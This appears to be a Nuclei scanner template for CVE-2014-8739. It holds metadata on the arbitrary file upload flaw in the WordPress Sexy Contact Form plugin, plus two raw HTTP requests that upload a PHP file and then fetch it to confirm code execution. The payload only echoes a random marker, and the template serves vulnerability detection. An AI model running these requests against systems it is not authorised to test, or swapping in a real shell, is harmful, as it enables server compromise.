id: CVE-2014-8739

info:
  name: WordPress Sexy Contact Form (<= 0.9.7) - Arbitrary File Upload
  author: melmathari
  severity: critical
  description: |
    Unrestricted file upload vulnerability in server/php/UploadHandler.php in the jQuery File Upload Plugin 6.4.4 for jQuery, as used in the Creative Solutions Creative Contact Form (formerly Sexy Contact Form) before 1.0.0 for WordPress and before 2.0.1 for Joomla!, allows remote attackers to execute arbitrary code by uploading a PHP file with an PHP extension, then accessing it via a direct request to the file in files/, as exploited in the wild in October 2014.
  impact: |
    Attackers can execute arbitrary PHP code on the server, leading to full system compromise.
  remediation: |
    Update to the latest version of the plugin that fixes this issue or implement server-side validation to restrict file types.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2014-8739
    - https://www.exploit-db.com/exploits/35057
    - https://www.exploit-db.com/exploits/36811
    - http://www.openwall.com/lists/oss-security/2014/11/11/4
    - http://www.openwall.com/lists/oss-security/2014/11/11/5
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2014-8739
    cwe-id: CWE-434
    epss-score: 0.91656
    epss-percentile: 0.998
    cpe: cpe:2.3:a:creative-solutions:creative_contact_form:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: creative-solutions
    product: creative_contact_form
    framework: wordpress
    publicwww-query: "/wp-content/plugins/sexy-contact-form/"
  tags: cve,cve2014,wordpress,wp-plugin,wp,sexy-contact-form,intrusive,file-upload,rce,vkev,vuln

flow: http(1) && http(2)

variables:
  marker: "{{randstr}}"
  fname: "{{rand_base(6)}}"

http:
  - raw:
      - |
        POST /wp-content/plugins/sexy-contact-form/includes/fileupload/index.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW

        ------WebKitFormBoundary7MA4YWxkTrZu0gW
        Content-Disposition: form-data; name="files[]"; filename="{{fname}}.php"
        Content-Type: application/octet-stream

        <?php echo "{{marker}}"; ?>
        ------WebKitFormBoundary7MA4YWxkTrZu0gW--

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "files","delete_url")'
          - 'contains(content_type, "text/plain")'
        condition: and
        internal: true

  - raw:
      - |
        GET /wp-content/plugins/sexy-contact-form/includes/fileupload/files/{{fname}}.php HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        words:
          - "{{marker}}"
# digest: 490a0046304402206acfffa221f1b0924fc49e015a868be3d5dafcab94612dccccbd4da306b6bb470220567e132f77e7fd7d1d5cf051df34d1523fba6fef4e199ee238a244ae0886ea2d:922c64590222798bb761d5b6d8e72950